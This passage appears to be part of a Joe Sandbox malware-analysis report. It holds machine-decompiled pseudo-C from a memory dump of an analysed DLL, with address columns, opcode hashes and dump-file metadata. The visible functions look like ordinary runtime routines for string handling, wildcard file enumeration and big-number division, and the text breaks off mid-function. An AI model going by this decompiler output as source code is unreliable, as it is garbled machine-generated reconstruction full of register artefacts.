                                                                                        				_t2 = _t83 + 1; // 0x1
                                                                                        				_t101 = _t2;
                                                                                        				do {
                                                                                        					_t35 =  *_t83;
                                                                                        					_t83 = _t83 + 1;
                                                                                        				} while (_t35 != 0);
                                                                                        				_push(__edi);
                                                                                        				_t105 = _a12;
                                                                                        				_t85 = _t83 - _t101 + 1;
                                                                                        				_v8 = _t85;
                                                                                        				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                                                                                        					_push(__ebx);
                                                                                        					_push(__esi);
                                                                                        					_t5 = _t105 + 1; // 0x1
                                                                                        					_t78 = _t5 + _t85;
                                                                                        					_t111 = E1000AF17(_t85, _t78, 1);
                                                                                        					_pop(_t87);
                                                                                        					__eflags = _t105;
                                                                                        					if(_t105 == 0) {
                                                                                        						L6:
                                                                                        						_push(_v8);
                                                                                        						_t78 = _t78 - _t105;
                                                                                        						_t40 = E1000F27B(_t87, _t111 + _t105, _t78, _a4);
                                                                                        						_t120 = _t119 + 0x10;
                                                                                        						__eflags = _t40;
                                                                                        						if(__eflags != 0) {
                                                                                        							goto L9;
                                                                                        						} else {
                                                                                        							_t72 = E1000B35B(_a16, __eflags, _t111);
                                                                                        							E10009811(0);
                                                                                        							_t74 = _t72;
                                                                                        							goto L8;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_push(_t105);
                                                                                        						_t75 = E1000F27B(_t87, _t111, _t78, _a8);
                                                                                        						_t120 = _t119 + 0x10;
                                                                                        						__eflags = _t75;
                                                                                        						if(_t75 != 0) {
                                                                                        							L9:
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							E100061FC();
                                                                                        							asm("int3");
                                                                                        							_t118 = _t120;
                                                                                        							_t121 = _t120 - 0x150;
                                                                                        							_t43 =  *0x1001a004; // 0xcfb68a75
                                                                                        							_v48 = _t43 ^ _t118;
                                                                                        							_t88 = _v32;
                                                                                        							_push(_t78);
                                                                                        							_t79 = _v36;
                                                                                        							_push(_t111);
                                                                                        							_t112 = _v332.cAlternateFileName;
                                                                                        							_push(_t105);
                                                                                        							_v372 = _t112;
                                                                                        							while(1) {
                                                                                        								__eflags = _t88 - _t79;
                                                                                        								if(_t88 == _t79) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t45 =  *_t88;
                                                                                        								__eflags = _t45 - 0x2f;
                                                                                        								if(_t45 != 0x2f) {
                                                                                        									__eflags = _t45 - 0x5c;
                                                                                        									if(_t45 != 0x5c) {
                                                                                        										__eflags = _t45 - 0x3a;
                                                                                        										if(_t45 != 0x3a) {
                                                                                        											_t88 = E1000F2D0(_t79, _t88);
                                                                                        											continue;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								break;
                                                                                        							}
                                                                                        							_t102 =  *_t88;
                                                                                        							__eflags = _t102 - 0x3a;
                                                                                        							if(_t102 != 0x3a) {
                                                                                        								L19:
                                                                                        								_t106 = 0;
                                                                                        								__eflags = _t102 - 0x2f;
                                                                                        								if(_t102 == 0x2f) {
                                                                                        									L23:
                                                                                        									_t47 = 1;
                                                                                        									__eflags = 1;
                                                                                        								} else {
                                                                                        									__eflags = _t102 - 0x5c;
                                                                                        									if(_t102 == 0x5c) {
                                                                                        										goto L23;
                                                                                        									} else {
                                                                                        										__eflags = _t102 - 0x3a;
                                                                                        										if(_t102 == 0x3a) {
                                                                                        											goto L23;
                                                                                        										} else {
                                                                                        											_t47 = 0;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								_t90 = _t88 - _t79 + 1;
                                                                                        								asm("sbb eax, eax");
                                                                                        								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                                                                                        								E10003E50(_t106,  &_v332, _t106, 0x140);
                                                                                        								_t122 = _t121 + 0xc;
                                                                                        								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                                                                                        								_t55 = _v336;
                                                                                        								__eflags = _t113 - 0xffffffff;
                                                                                        								if(_t113 != 0xffffffff) {
                                                                                        									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                                                        									__eflags = _t92;
                                                                                        									_t93 = _t92 >> 2;
                                                                                        									_v344 = _t92 >> 2;
                                                                                        									do {
                                                                                        										__eflags = _v332.cFileName - 0x2e;
                                                                                        										if(_v332.cFileName != 0x2e) {
                                                                                        											L36:
                                                                                        											_push(_t55);
                                                                                        											_t57 = E1000B11C(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
                                                                                        											_t122 = _t122 + 0x10;
                                                                                        											__eflags = _t57;
                                                                                        											if(_t57 != 0) {
                                                                                        												goto L26;
                                                                                        											} else {
                                                                                        												goto L37;
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t93 = _v287;
                                                                                        											__eflags = _t93;
                                                                                        											if(_t93 == 0) {
                                                                                        												goto L37;
                                                                                        											} else {
                                                                                        												__eflags = _t93 - 0x2e;
                                                                                        												if(_t93 != 0x2e) {
                                                                                        													goto L36;
                                                                                        												} else {
                                                                                        													__eflags = _v286;
                                                                                        													if(_v286 == 0) {
                                                                                        														goto L37;
                                                                                        													} else {
                                                                                        														goto L36;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        										goto L40;
                                                                                        										L37:
                                                                                        										_t62 = FindNextFileA(_t113,  &_v332);
                                                                                        										__eflags = _t62;
                                                                                        										_t55 = _v336;
                                                                                        									} while (_t62 != 0);
                                                                                        									_t103 =  *_t55;
                                                                                        									_t96 = _v344;
                                                                                        									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                                                        									__eflags = _t96 - _t65;
                                                                                        									if(_t96 != _t65) {
                                                                                        										E1000EE30(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E1000AF74);
                                                                                        									}
                                                                                        								} else {
                                                                                        									_push(_t55);
                                                                                        									_t57 = E1000B11C(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                                                                                        									L26:
                                                                                        									_t106 = _t57;
                                                                                        								}
                                                                                        								__eflags = _t113 - 0xffffffff;
                                                                                        								if(_t113 != 0xffffffff) {
                                                                                        									FindClose(_t113);
                                                                                        								}
                                                                                        							} else {
                                                                                        								__eflags = _t88 -  &(_t79[1]);
                                                                                        								if(_t88 ==  &(_t79[1])) {
                                                                                        									goto L19;
                                                                                        								} else {
                                                                                        									_push(_t112);
                                                                                        									E1000B11C(_t79, _t88, 0, _t112, _t79, 0, 0);
                                                                                        								}
                                                                                        							}
                                                                                        							__eflags = _v12 ^ _t118;
                                                                                        							return E1000296F(_v12 ^ _t118);
                                                                                        						} else {
                                                                                        							goto L6;
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t74 = 0xc;
                                                                                        					L8:
                                                                                        					return _t74;
                                                                                        				}
                                                                                        				L40:
                                                                                        			}















































                                                                                        0x1000b121
                                                                                        0x1000b122
                                                                                        0x1000b125
                                                                                        0x1000b125
                                                                                        0x1000b128
                                                                                        0x1000b128
                                                                                        0x1000b12a
                                                                                        0x1000b12b
                                                                                        0x1000b134
                                                                                        0x1000b135
                                                                                        0x1000b138
                                                                                        0x1000b13b
                                                                                        0x1000b140
                                                                                        0x1000b147
                                                                                        0x1000b148
                                                                                        0x1000b149
                                                                                        0x1000b14c
                                                                                        0x1000b156
                                                                                        0x1000b159
                                                                                        0x1000b15a
                                                                                        0x1000b15c
                                                                                        0x1000b170
                                                                                        0x1000b170
                                                                                        0x1000b173
                                                                                        0x1000b17d
                                                                                        0x1000b182
                                                                                        0x1000b185
                                                                                        0x1000b187
                                                                                        0x00000000
                                                                                        0x1000b189
                                                                                        0x1000b18d
                                                                                        0x1000b196
                                                                                        0x1000b19c
                                                                                        0x00000000
                                                                                        0x1000b19f
                                                                                        0x1000b15e
                                                                                        0x1000b15e
                                                                                        0x1000b164
                                                                                        0x1000b169
                                                                                        0x1000b16c
                                                                                        0x1000b16e
                                                                                        0x1000b1a5
                                                                                        0x1000b1a7
                                                                                        0x1000b1a8
                                                                                        0x1000b1a9
                                                                                        0x1000b1aa
                                                                                        0x1000b1ab
                                                                                        0x1000b1ac
                                                                                        0x1000b1b1
                                                                                        0x1000b1b5
                                                                                        0x1000b1b7
                                                                                        0x1000b1bd
                                                                                        0x1000b1c4
                                                                                        0x1000b1c7
                                                                                        0x1000b1ca
                                                                                        0x1000b1cb
                                                                                        0x1000b1ce
                                                                                        0x1000b1cf
                                                                                        0x1000b1d2
                                                                                        0x1000b1d3
                                                                                        0x1000b1f4
                                                                                        0x1000b1f4
                                                                                        0x1000b1f6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b1db
                                                                                        0x1000b1dd
                                                                                        0x1000b1df
                                                                                        0x1000b1e1
                                                                                        0x1000b1e3
                                                                                        0x1000b1e5
                                                                                        0x1000b1e7
                                                                                        0x1000b1f2
                                                                                        0x00000000
                                                                                        0x1000b1f2
                                                                                        0x1000b1e7
                                                                                        0x1000b1e3
                                                                                        0x00000000
                                                                                        0x1000b1df
                                                                                        0x1000b1f8
                                                                                        0x1000b1fa
                                                                                        0x1000b1fd
                                                                                        0x1000b216
                                                                                        0x1000b216
                                                                                        0x1000b218
                                                                                        0x1000b21b
                                                                                        0x1000b22b
                                                                                        0x1000b22d
                                                                                        0x1000b22d
                                                                                        0x1000b21d
                                                                                        0x1000b21d
                                                                                        0x1000b220
                                                                                        0x00000000
                                                                                        0x1000b222
                                                                                        0x1000b222
                                                                                        0x1000b225
                                                                                        0x00000000
                                                                                        0x1000b227
                                                                                        0x1000b227
                                                                                        0x1000b227
                                                                                        0x1000b225
                                                                                        0x1000b220
                                                                                        0x1000b233
                                                                                        0x1000b23b
                                                                                        0x1000b23f
                                                                                        0x1000b24d
                                                                                        0x1000b252
                                                                                        0x1000b267
                                                                                        0x1000b269
                                                                                        0x1000b26f
                                                                                        0x1000b272
                                                                                        0x1000b2a4
                                                                                        0x1000b2a4
                                                                                        0x1000b2a6
                                                                                        0x1000b2a9
                                                                                        0x1000b2af
                                                                                        0x1000b2af
                                                                                        0x1000b2b6
                                                                                        0x1000b2d0
                                                                                        0x1000b2d0
                                                                                        0x1000b2df
                                                                                        0x1000b2e4
                                                                                        0x1000b2e7
                                                                                        0x1000b2e9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b2b8
                                                                                        0x1000b2b8
                                                                                        0x1000b2be
                                                                                        0x1000b2c0
                                                                                        0x00000000
                                                                                        0x1000b2c2
                                                                                        0x1000b2c2
                                                                                        0x1000b2c5
                                                                                        0x00000000
                                                                                        0x1000b2c7
                                                                                        0x1000b2c7
                                                                                        0x1000b2ce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b2ce
                                                                                        0x1000b2c5
                                                                                        0x1000b2c0
                                                                                        0x00000000
                                                                                        0x1000b2eb
                                                                                        0x1000b2f3
                                                                                        0x1000b2f9
                                                                                        0x1000b2fb
                                                                                        0x1000b2fb
                                                                                        0x1000b303
                                                                                        0x1000b308
                                                                                        0x1000b310
                                                                                        0x1000b313
                                                                                        0x1000b315
                                                                                        0x1000b329
                                                                                        0x1000b32e
                                                                                        0x1000b274
                                                                                        0x1000b274
                                                                                        0x1000b278
                                                                                        0x1000b280
                                                                                        0x1000b280
                                                                                        0x1000b280
                                                                                        0x1000b282
                                                                                        0x1000b285
                                                                                        0x1000b288
                                                                                        0x1000b288
                                                                                        0x1000b1ff
                                                                                        0x1000b202
                                                                                        0x1000b204
                                                                                        0x00000000
                                                                                        0x1000b206
                                                                                        0x1000b206
                                                                                        0x1000b20c
                                                                                        0x1000b211
                                                                                        0x1000b204
                                                                                        0x1000b295
                                                                                        0x1000b2a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000b16e
                                                                                        0x1000b142
                                                                                        0x1000b144
                                                                                        0x1000b1a0
                                                                                        0x1000b1a4
                                                                                        0x1000b1a4
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: 4091e5fab384eaaf8bec6cc9949bb28f07285ebe96e6fd3d80a63aa5835a013b
                                                                                        • Instruction ID: 89b365f612784594abd6e7a52d15e34acb37987ab8124a7059603a29ef005017
                                                                                        • Opcode Fuzzy Hash: 4091e5fab384eaaf8bec6cc9949bb28f07285ebe96e6fd3d80a63aa5835a013b
                                                                                        • Instruction Fuzzy Hash: 8231077580064AAFEB14CE78CC94EEB7BFDEB86384F0102A8F919D7255E630AD41CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 90%
                                                                                        			E1000CB30(signed int* _a4, signed int* _a8) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _v32;
                                                                                        				signed int _v36;
                                                                                        				signed int _v40;
                                                                                        				signed int _v44;
                                                                                        				signed int _v52;
                                                                                        				signed int _v56;
                                                                                        				signed int _v60;
                                                                                        				signed int _v64;
                                                                                        				signed int _v68;
                                                                                        				signed int _v72;
                                                                                        				signed int _v76;
                                                                                        				signed int* _v80;
                                                                                        				char _v540;
                                                                                        				signed int _v544;
                                                                                        				signed int _t197;
                                                                                        				signed int _t198;
                                                                                        				signed int* _t200;
                                                                                        				signed int _t201;
                                                                                        				signed int _t204;
                                                                                        				signed int _t206;
                                                                                        				signed int _t208;
                                                                                        				signed int _t209;
                                                                                        				signed int _t213;
                                                                                        				signed int _t219;
                                                                                        				intOrPtr _t225;
                                                                                        				void* _t228;
                                                                                        				signed int _t230;
                                                                                        				signed int _t247;
                                                                                        				signed int _t250;
                                                                                        				void* _t253;
                                                                                        				signed int _t256;
                                                                                        				signed int* _t262;
                                                                                        				signed int _t263;
                                                                                        				signed int _t264;
                                                                                        				void* _t265;
                                                                                        				intOrPtr* _t266;
                                                                                        				signed int _t267;
                                                                                        				signed int _t269;
                                                                                        				signed int _t270;
                                                                                        				signed int _t271;
                                                                                        				signed int _t272;
                                                                                        				signed int* _t274;
                                                                                        				signed int* _t278;
                                                                                        				signed int _t279;
                                                                                        				signed int _t280;
                                                                                        				intOrPtr _t282;
                                                                                        				void* _t286;
                                                                                        				signed char _t292;
                                                                                        				signed int _t295;
                                                                                        				signed int _t303;
                                                                                        				signed int _t306;
                                                                                        				signed int _t307;
                                                                                        				signed int _t309;
                                                                                        				signed int _t311;
                                                                                        				signed int _t313;
                                                                                        				intOrPtr* _t314;
                                                                                        				signed int _t318;
                                                                                        				signed int _t322;
                                                                                        				signed int* _t328;
                                                                                        				signed int _t330;
                                                                                        				signed int _t331;
                                                                                        				signed int _t333;
                                                                                        				void* _t334;
                                                                                        				signed int _t336;
                                                                                        				signed int _t338;
                                                                                        				signed int _t341;
                                                                                        				signed int _t342;
                                                                                        				signed int* _t344;
                                                                                        				signed int _t349;
                                                                                        				signed int _t351;
                                                                                        				void* _t355;
                                                                                        				signed int _t359;
                                                                                        				signed int _t360;
                                                                                        				signed int _t362;
                                                                                        				signed int* _t368;
                                                                                        				signed int* _t369;
                                                                                        				signed int* _t370;
                                                                                        				signed int* _t373;
                                                                                        
                                                                                        				_t262 = _a4;
                                                                                        				_t197 =  *_t262;
                                                                                        				if(_t197 != 0) {
                                                                                        					_t328 = _a8;
                                                                                        					_t267 =  *_t328;
                                                                                        					__eflags = _t267;
                                                                                        					if(_t267 != 0) {
                                                                                        						_t3 = _t197 - 1; // -1
                                                                                        						_t349 = _t3;
                                                                                        						_t4 = _t267 - 1; // -1
                                                                                        						_t198 = _t4;
                                                                                        						_v16 = _t349;
                                                                                        						__eflags = _t198;
                                                                                        						if(_t198 != 0) {
                                                                                        							__eflags = _t198 - _t349;
                                                                                        							if(_t198 > _t349) {
                                                                                        								L23:
                                                                                        								__eflags = 0;
                                                                                        								return 0;
                                                                                        							} else {
                                                                                        								_t46 = _t198 + 1; // 0x0
                                                                                        								_t306 = _t349 - _t198;
                                                                                        								_v60 = _t46;
                                                                                        								_t269 = _t349;
                                                                                        								__eflags = _t349 - _t306;
                                                                                        								if(_t349 < _t306) {
                                                                                        									L21:
                                                                                        									_t306 = _t306 + 1;
                                                                                        									__eflags = _t306;
                                                                                        								} else {
                                                                                        									_t368 =  &(_t262[_t349 + 1]);
                                                                                        									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                                                        									__eflags = _t341;
                                                                                        									while(1) {
                                                                                        										__eflags =  *_t341 -  *_t368;
                                                                                        										if( *_t341 !=  *_t368) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t269 = _t269 - 1;
                                                                                        										_t341 = _t341 - 4;
                                                                                        										_t368 = _t368 - 4;
                                                                                        										__eflags = _t269 - _t306;
                                                                                        										if(_t269 >= _t306) {
                                                                                        											continue;
                                                                                        										} else {
                                                                                        											goto L21;
                                                                                        										}
                                                                                        										goto L22;
                                                                                        									}
                                                                                        									_t369 = _a8;
                                                                                        									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                                                                                        									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                                                        									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                                                        										goto L21;
                                                                                        									}
                                                                                        								}
                                                                                        								L22:
                                                                                        								__eflags = _t306;
                                                                                        								if(__eflags != 0) {
                                                                                        									_t330 = _v60;
                                                                                        									_t200 = _a8;
                                                                                        									_t351 =  *(_t200 + _t330 * 4);
                                                                                        									_t64 = _t330 * 4; // 0xffffe9e5
                                                                                        									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                                                                                        									_v36 = _t201;
                                                                                        									asm("bsr eax, esi");
                                                                                        									_v56 = _t351;
                                                                                        									if(__eflags == 0) {
                                                                                        										_t270 = 0x20;
                                                                                        									} else {
                                                                                        										_t270 = 0x1f - _t201;
                                                                                        									}
                                                                                        									_v40 = _t270;
                                                                                        									_v64 = 0x20 - _t270;
                                                                                        									__eflags = _t270;
                                                                                        									if(_t270 != 0) {
                                                                                        										_t292 = _v40;
                                                                                        										_v36 = _v36 << _t292;
                                                                                        										_v56 = _t351 << _t292 | _v36 >> _v64;
                                                                                        										__eflags = _t330 - 2;
                                                                                        										if(_t330 > 2) {
                                                                                        											_t79 = _t330 * 4; // 0xe850ffff
                                                                                        											_t81 =  &_v36;
                                                                                        											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                                                                                        											__eflags =  *_t81;
                                                                                        										}
                                                                                        									}
                                                                                        									_v76 = 0;
                                                                                        									_t307 = _t306 + 0xffffffff;
                                                                                        									__eflags = _t307;
                                                                                        									_v32 = _t307;
                                                                                        									if(_t307 < 0) {
                                                                                        										_t331 = 0;
                                                                                        										__eflags = 0;
                                                                                        									} else {
                                                                                        										_t85 =  &(_t262[1]); // 0x4
                                                                                        										_v20 =  &(_t85[_t307]);
                                                                                        										_t206 = _t307 + _t330;
                                                                                        										_t90 = _t262 - 4; // -4
                                                                                        										_v12 = _t206;
                                                                                        										_t278 = _t90 + _t206 * 4;
                                                                                        										_v80 = _t278;
                                                                                        										do {
                                                                                        											__eflags = _t206 - _v16;
                                                                                        											if(_t206 > _v16) {
                                                                                        												_t207 = 0;
                                                                                        												__eflags = 0;
                                                                                        											} else {
                                                                                        												_t207 = _t278[2];
                                                                                        											}
                                                                                        											__eflags = _v40;
                                                                                        											_t311 = _t278[1];
                                                                                        											_t279 =  *_t278;
                                                                                        											_v52 = _t207;
                                                                                        											_v44 = 0;
                                                                                        											_v8 = _t207;
                                                                                        											_v24 = _t279;
                                                                                        											if(_v40 > 0) {
                                                                                        												_t318 = _v8;
                                                                                        												_t336 = _t279 >> _v64;
                                                                                        												_t230 = E10012680(_t311, _v40, _t318);
                                                                                        												_t279 = _v40;
                                                                                        												_t207 = _t318;
                                                                                        												_t311 = _t336 | _t230;
                                                                                        												_t359 = _v24 << _t279;
                                                                                        												__eflags = _v12 - 3;
                                                                                        												_v8 = _t318;
                                                                                        												_v24 = _t359;
                                                                                        												if(_v12 >= 3) {
                                                                                        													_t279 = _v64;
                                                                                        													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                                                                                        													__eflags = _t360;
                                                                                        													_t207 = _v8;
                                                                                        													_v24 = _t360;
                                                                                        												}
                                                                                        											}
                                                                                        											_t208 = E10012410(_t311, _t207, _v56, 0);
                                                                                        											_v44 = _t262;
                                                                                        											_t263 = _t208;
                                                                                        											_v44 = 0;
                                                                                        											_t209 = _t311;
                                                                                        											_v8 = _t263;
                                                                                        											_v28 = _t209;
                                                                                        											_t333 = _t279;
                                                                                        											_v72 = _t263;
                                                                                        											_v68 = _t209;
                                                                                        											__eflags = _t209;
                                                                                        											if(_t209 != 0) {
                                                                                        												L40:
                                                                                        												_t264 = _t263 + 1;
                                                                                        												asm("adc eax, 0xffffffff");
                                                                                        												_t333 = _t333 + E10012510(_t264, _t209, _v56, 0);
                                                                                        												asm("adc esi, edx");
                                                                                        												_t263 = _t264 | 0xffffffff;
                                                                                        												_t209 = 0;
                                                                                        												__eflags = 0;
                                                                                        												_v44 = 0;
                                                                                        												_v8 = _t263;
                                                                                        												_v72 = _t263;
                                                                                        												_v28 = 0;
                                                                                        												_v68 = 0;
                                                                                        											} else {
                                                                                        												__eflags = _t263 - 0xffffffff;
                                                                                        												if(_t263 > 0xffffffff) {
                                                                                        													goto L40;
                                                                                        												}
                                                                                        											}
                                                                                        											__eflags = 0;
                                                                                        											if(0 <= 0) {
                                                                                        												if(0 < 0) {
                                                                                        													goto L44;
                                                                                        												} else {
                                                                                        													__eflags = _t333 - 0xffffffff;
                                                                                        													if(_t333 <= 0xffffffff) {
                                                                                        														while(1) {
                                                                                        															L44:
                                                                                        															_v8 = _v24;
                                                                                        															_t228 = E10012510(_v36, 0, _t263, _t209);
                                                                                        															__eflags = _t311 - _t333;
                                                                                        															if(__eflags < 0) {
                                                                                        																break;
                                                                                        															}
                                                                                        															if(__eflags > 0) {
                                                                                        																L47:
                                                                                        																_t209 = _v28;
                                                                                        																_t263 = _t263 + 0xffffffff;
                                                                                        																_v72 = _t263;
                                                                                        																asm("adc eax, 0xffffffff");
                                                                                        																_t333 = _t333 + _v56;
                                                                                        																__eflags = _t333;
                                                                                        																_v28 = _t209;
                                                                                        																asm("adc dword [ebp-0x28], 0x0");
                                                                                        																_v68 = _t209;
                                                                                        																if(_t333 == 0) {
                                                                                        																	__eflags = _t333 - 0xffffffff;
                                                                                        																	if(_t333 <= 0xffffffff) {
                                                                                        																		continue;
                                                                                        																	} else {
                                                                                        																	}
                                                                                        																}
                                                                                        															} else {
                                                                                        																__eflags = _t228 - _v8;
                                                                                        																if(_t228 <= _v8) {
                                                                                        																	break;
                                                                                        																} else {
                                                                                        																	goto L47;
                                                                                        																}
                                                                                        															}
                                                                                        															L51:
                                                                                        															_v8 = _t263;
                                                                                        															goto L52;
                                                                                        														}
                                                                                        														_t209 = _v28;
                                                                                        														goto L51;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        											L52:
                                                                                        											__eflags = _t209;
                                                                                        											if(_t209 != 0) {
                                                                                        												L54:
                                                                                        												_t280 = _v60;
                                                                                        												_t334 = 0;
                                                                                        												_t355 = 0;
                                                                                        												__eflags = _t280;
                                                                                        												if(_t280 != 0) {
                                                                                        													_t266 = _v20;
                                                                                        													_t219 =  &(_a8[1]);
                                                                                        													__eflags = _t219;
                                                                                        													_v24 = _t219;
                                                                                        													_v16 = _t280;
                                                                                        													do {
                                                                                        														_v44 =  *_t219;
                                                                                        														_t225 =  *_t266;
                                                                                        														_t286 = _t334 + _v72 * _v44;
                                                                                        														asm("adc esi, edx");
                                                                                        														_t334 = _t355;
                                                                                        														_t355 = 0;
                                                                                        														__eflags = _t225 - _t286;
                                                                                        														if(_t225 < _t286) {
                                                                                        															_t334 = _t334 + 1;
                                                                                        															asm("adc esi, esi");
                                                                                        														}
                                                                                        														 *_t266 = _t225 - _t286;
                                                                                        														_t266 = _t266 + 4;
                                                                                        														_t219 = _v24 + 4;
                                                                                        														_t164 =  &_v16;
                                                                                        														 *_t164 = _v16 - 1;
                                                                                        														__eflags =  *_t164;
                                                                                        														_v24 = _t219;
                                                                                        													} while ( *_t164 != 0);
                                                                                        													_t263 = _v8;
                                                                                        													_t280 = _v60;
                                                                                        												}
                                                                                        												__eflags = 0 - _t355;
                                                                                        												if(__eflags <= 0) {
                                                                                        													if(__eflags < 0) {
                                                                                        														L63:
                                                                                        														__eflags = _t280;
                                                                                        														if(_t280 != 0) {
                                                                                        															_t338 = _t280;
                                                                                        															_t314 = _v20;
                                                                                        															_t362 =  &(_a8[1]);
                                                                                        															__eflags = _t362;
                                                                                        															_t265 = 0;
                                                                                        															do {
                                                                                        																_t282 =  *_t314;
                                                                                        																_t172 = _t362 + 4; // 0xa6a5959
                                                                                        																_t362 = _t172;
                                                                                        																_t314 = _t314 + 4;
                                                                                        																asm("adc eax, eax");
                                                                                        																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                                                                                        																asm("adc eax, 0x0");
                                                                                        																_t265 = 0;
                                                                                        																_t338 = _t338 - 1;
                                                                                        																__eflags = _t338;
                                                                                        															} while (_t338 != 0);
                                                                                        															_t263 = _v8;
                                                                                        														}
                                                                                        														_t263 = _t263 + 0xffffffff;
                                                                                        														asm("adc dword [ebp-0x18], 0xffffffff");
                                                                                        													} else {
                                                                                        														__eflags = _v52 - _t334;
                                                                                        														if(_v52 < _t334) {
                                                                                        															goto L63;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        												_t213 = _v12 - 1;
                                                                                        												__eflags = _t213;
                                                                                        												_v16 = _t213;
                                                                                        											} else {
                                                                                        												__eflags = _t263;
                                                                                        												if(_t263 != 0) {
                                                                                        													goto L54;
                                                                                        												}
                                                                                        											}
                                                                                        											_t331 = 0 + _t263;
                                                                                        											asm("adc esi, 0x0");
                                                                                        											_v20 = _v20 - 4;
                                                                                        											_t313 = _v32 - 1;
                                                                                        											_t262 = _a4;
                                                                                        											_t278 = _v80 - 4;
                                                                                        											_t206 = _v12 - 1;
                                                                                        											_v76 = _t331;
                                                                                        											_v32 = _t313;
                                                                                        											_v80 = _t278;
                                                                                        											_v12 = _t206;
                                                                                        											__eflags = _t313;
                                                                                        										} while (_t313 >= 0);
                                                                                        									}
                                                                                        									_t309 = _v16 + 1;
                                                                                        									_t204 = _t309;
                                                                                        									__eflags = _t204 -  *_t262;
                                                                                        									if(_t204 <  *_t262) {
                                                                                        										_t191 = _t204 + 1; // 0x1000e14d
                                                                                        										_t274 =  &(_t262[_t191]);
                                                                                        										do {
                                                                                        											 *_t274 = 0;
                                                                                        											_t194 =  &(_t274[1]); // 0x91850fc2
                                                                                        											_t274 = _t194;
                                                                                        											_t204 = _t204 + 1;
                                                                                        											__eflags = _t204 -  *_t262;
                                                                                        										} while (_t204 <  *_t262);
                                                                                        									}
                                                                                        									 *_t262 = _t309;
                                                                                        									__eflags = _t309;
                                                                                        									if(_t309 != 0) {
                                                                                        										while(1) {
                                                                                        											_t271 =  *_t262;
                                                                                        											__eflags = _t262[_t271];
                                                                                        											if(_t262[_t271] != 0) {
                                                                                        												goto L78;
                                                                                        											}
                                                                                        											_t272 = _t271 + 0xffffffff;
                                                                                        											__eflags = _t272;
                                                                                        											 *_t262 = _t272;
                                                                                        											if(_t272 != 0) {
                                                                                        												continue;
                                                                                        											}
                                                                                        											goto L78;
                                                                                        										}
                                                                                        									}
                                                                                        									L78:
                                                                                        									return _t331;
                                                                                        								} else {
                                                                                        									goto L23;
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t6 =  &(_t328[1]); // 0xfc23b5a
                                                                                        							_t295 =  *_t6;
                                                                                        							_v44 = _t295;
                                                                                        							__eflags = _t295 - 1;
                                                                                        							if(_t295 != 1) {
                                                                                        								__eflags = _t349;
                                                                                        								if(_t349 != 0) {
                                                                                        									_t342 = 0;
                                                                                        									_v12 = 0;
                                                                                        									_v8 = 0;
                                                                                        									_v20 = 0;
                                                                                        									__eflags = _t349 - 0xffffffff;
                                                                                        									if(_t349 != 0xffffffff) {
                                                                                        										_t250 = _v16 + 1;
                                                                                        										__eflags = _t250;
                                                                                        										_v32 = _t250;
                                                                                        										_t373 =  &(_t262[_t349 + 1]);
                                                                                        										do {
                                                                                        											_t253 = E10012410( *_t373, _t342, _t295, 0);
                                                                                        											_v68 = _t303;
